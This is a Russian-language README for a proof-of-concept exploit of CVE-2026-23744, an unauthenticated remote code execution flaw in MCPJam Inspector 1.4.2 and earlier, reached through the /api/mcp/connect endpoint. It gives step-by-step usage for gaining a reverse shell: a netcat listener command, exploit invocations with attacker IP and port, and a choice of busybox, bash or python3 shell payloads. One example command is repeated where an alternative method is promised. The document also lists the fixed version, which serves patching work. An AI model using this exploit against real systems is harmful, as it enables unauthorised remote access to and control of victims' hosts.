CVE-2026-23744 — Proof of concept эксплойт для уязвимости неаутентифицированного удалённого выполнения кода в MCPJam Inspector <= 1.4.2.
MCPJam Inspector <= 1.4.2 по умолчанию привязывается к 0.0.0.0 и предоставляет доступ к /api/mcp/connect без какой-либо аутентификации. Конечная точка принимает объект serverConfig, который напрямую запускает процесс на хосте — передача полезной нагрузки с обратной оболочкой даёт немедленное RCE без необходимости в учётных данных.
pip install requests
python3 exploit.py -u <target_url> -i <lhost> -p <lport> [-m <method>]
| Флаг | Описание | По умолчанию |
|---|---|---|
-u | URL цели | обязательно |
-i | IP вашего слушателя (LHOST) | обязательно |
-p | Порт вашего слушателя (LPORT) | обязательно |
-m | Метод полезной нагрузки: busybox, bash, python3 | busybox |
Шаг 1 — Запустите слушатель:
nc -lvnp 4444
Шаг 2 — Запустите эксплойт:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
Если busybox не работает на цели, попробуйте другие методы:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
| Программное обеспечение | Уязвимо | Исправлено |
|---|---|---|
| MCPJam Inspector | <= 1.4.2 | 1.4.3 |